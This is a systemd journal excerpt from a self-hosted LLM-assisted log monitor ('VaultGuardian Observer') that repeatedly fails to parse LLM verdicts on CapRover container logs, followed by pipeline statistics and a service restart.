- - [19/Mar/2026:22:44:45 +0000] "api.admin.kovicloud.... Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703639 [llm] Failed to parse verdict from: Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703675 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:04 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:04.703686 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:47.600443246Z 98.152.173.124 - - [19/Mar/2026:22:44:47 +0000] "captain.admin.kovicl... 
Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.141133 [watcher] New container started: srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6) Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.141209 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6) Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893732 [llm] Failed to parse verdict from: Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893790 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:07 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:07.893801 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:50.600469337Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426382 [llm] Failed to parse verdict from: Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426419 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:14 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:14.426427 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:52.776708913Z 98.152.173.124 - - [19/Mar/2026:22:44:52 +0000] "login.admin.koviclou... 
Mar 19 22:45:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:15.192801 [observer] Pipeline: processed=66 pattern_hits=45 llm_calls=18 llm_errors=16 learned=0 Mar 19 22:45:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:15.192826 [observer] Patterns: hash=45 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=21 Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821007 [llm] Failed to parse verdict from: Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821041 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:19.821050 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:53.595258920Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239063 [llm] Failed to parse verdict from: Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239102 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:23 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:23.239111 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:44:52.902043196Z 2026/03/19 22:44:52 [error] 415#415: *741854 open() "/usr/share/nginx... 
Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018716 [llm] Failed to parse verdict from: Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018754 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:29 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:29.018763 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:56.598852416Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302855 [llm] Failed to parse verdict from: Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302889 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:32 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:32.302897 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553307247Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d... Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.286974 [llm] Failed to parse verdict from: Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.287012 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:37.287021 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:43:59.602827896Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326500 [llm] Failed to parse verdict from: Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326538 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:40 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:40.326547 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553368164Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d... Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.197812 [observer] Pipeline: processed=86 pattern_hits=58 llm_calls=24 llm_errors=22 learned=0 Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.197837 [observer] Patterns: hash=58 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=2 misses=28 Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888889 [llm] Failed to parse verdict from: Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888927 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:45.888935 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:02.700580615Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815634 [llm] Failed to parse verdict from: Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815676 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:48 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:48.815685 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.553921959Z 2026/03/19 22:45:07 [warn] 1#1: the "listen ... http2" directive is d... Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298207 [llm] Failed to parse verdict from: Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298245 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:45:54 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:54.298254 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:05.603522536Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852484 [llm] Failed to parse verdict from: Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852519 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:45:56 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:45:56.852527 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.558259864Z 98.152.173.124 - - [19/Mar/2026:22:45:07 +0000] "captain.admin.kovicl... 
Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883370 [llm] Failed to parse verdict from: Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883412 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:46:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:01.883420 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:07.612713029Z 98.152.173.124 - - [19/Mar/2026:22:45:07 +0000] "captain.admin.kovicl... Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114888 [llm] Failed to parse verdict from: Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114925 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:02.114933 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:08.593854160Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.907974 [llm] Failed to parse verdict from: Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.908009 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:46:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:09.908017 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:45:18.020732918Z 167.99.145.5 - - [19/Mar/2026:22:45:18 +0000] "login.admin.kovicloud.... 
Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056224 [llm] Failed to parse verdict from: Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056261 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:10.056269 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:11.597320314Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:46:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:15.192096 [observer] Pipeline: processed=101 pattern_hits=66 llm_calls=31 llm_errors=30 learned=0 Mar 19 22:46:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:15.192120 [observer] Patterns: hash=66 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=2 misses=35 Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172679 [llm] Failed to parse verdict from: Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172715 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:19 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:19.172723 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:14.598069720Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302850 [llm] Failed to parse verdict from: Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302896 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:26.302904 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:20.608139198Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135671 [llm] Failed to parse verdict from: Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135701 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:35 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:35.135709 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:23.582477182Z GET /api/v2/user/apps/appData/api 304 2.236 ms - - Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768780 [llm] Failed to parse verdict from: Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768832 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:44 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:44.768839 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:23.603123971Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:46:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:45.193948 [observer] Pipeline: processed=110 pattern_hits=71 llm_calls=35 llm_errors=34 learned=0 Mar 19 22:46:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:45.193977 [observer] Patterns: hash=71 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=39 Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.581955 [llm] Failed to parse verdict from: Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.581994 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:46:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:46:52.582004 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:26.603780201Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531840 [llm] Failed to parse verdict from: Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531886 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:01 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:01.531896 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:29.606977752Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686432 [llm] Failed to parse verdict from: Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686523 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:09 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:09.686534 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:32.601146077Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:47:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:15.195860 [observer] Pipeline: processed=115 pattern_hits=73 llm_calls=38 llm_errors=37 learned=0 Mar 19 22:47:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:15.195886 [observer] Patterns: hash=73 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=42 Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566854 [llm] Failed to parse verdict from: Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566892 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:17 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:17.566902 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:35.589584185Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203083 [llm] Failed to parse verdict from: Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203117 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:26 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:26.203125 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:38.603500995Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358488 [llm] Failed to parse verdict from: Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358520 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:39 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:39.358528 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:41.628031754Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:47:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:45.191961 [observer] Pipeline: processed=121 pattern_hits=76 llm_calls=41 llm_errors=40 learned=0 Mar 19 22:47:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:45.191983 [observer] Patterns: hash=76 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=45 Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277904 [llm] Failed to parse verdict from: Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277939 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:47 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:47.277947 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:44.635304354Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 200 ... Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532502 [llm] Failed to parse verdict from: Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532536 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:47:55 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:47:55.532544 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:47.596703711Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 200 ... 
Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651391 [llm] Failed to parse verdict from: Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651432 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:02 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:02.651441 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:50.593807294Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313680 [llm] Failed to parse verdict from: Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313715 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:10 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:10.313724 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:53.600513421Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... 
Mar 19 22:48:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:15.195695 [observer] Pipeline: processed=128 pattern_hits=79 llm_calls=45 llm_errors=44 learned=0 Mar 19 22:48:15 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:15.195718 [observer] Patterns: hash=79 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=49 Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288407 [llm] Failed to parse verdict from: Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288442 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:20 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:20.288451 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:56.600217701Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686629 [llm] Failed to parse verdict from: Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686673 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:28 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:28.686681 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:57.034461593Z GET /api/v2/user/apps/appData/api 304 1.906 ms - - Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297355 [llm] Failed to parse verdict from: Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297392 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:37 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:37.297402 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:57.868523115Z GET /api/v2/user/apps/appData/api 304 1.857 
ms - - Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.196605 [observer] Pipeline: processed=133 pattern_hits=81 llm_calls=48 llm_errors=47 learned=0 Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.196697 [observer] Patterns: hash=81 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=3 misses=52 Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.380893 [llm] Failed to parse verdict from: Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:45.380935 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input Mar 19 22:48:45 ip-172-26-12-110 observer[1562516]: [192B blob data] Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer... Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.943416 [observer] Shutting down... Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.945269 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.945302 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:44:58.726109838Z GET /api/v2/user/projects 304 7.056 ms - - Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.949625 [observer] Final stats: processed=136 pattern_hits=83 llm_calls=49 learned=0 Mar 19 22:48:52 ip-172-26-12-110 observer[1562516]: 2026/03/19 22:48:52.949642 [observer] Shutdown complete Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully. Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer. Mar 19 22:48:52 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer. 
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.963709 [observer] VaultGuardian Observer starting... Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.963771 [observer] Normalizer registry initialized Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970243 [observer] Pattern store initialized (4 scopes) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970268 [observer] Analyzer pipeline ready Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970374 [notifier] Generated default config at /var/lib/observer/notifications.yaml Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970576 [logwatch] Notifications: Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970585 [logwatch] ✗ webhook → not configured (set WEBHOOK_URL) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970590 [logwatch] ✓ email → drew@vaultdec.com Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970593 [logwatch] ✗ sms → not configured (set TWILIO_SID + ALERT_SMS_TO) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970596 [logwatch] ✗ push/ios → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970599 [logwatch] ✗ push/fcm → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970790 [observer] Starting container log watcher... 
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977374 [watcher] Found 8 running containers Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977417 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977545 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977613 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977545 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977699 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977778 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4) Mar 19 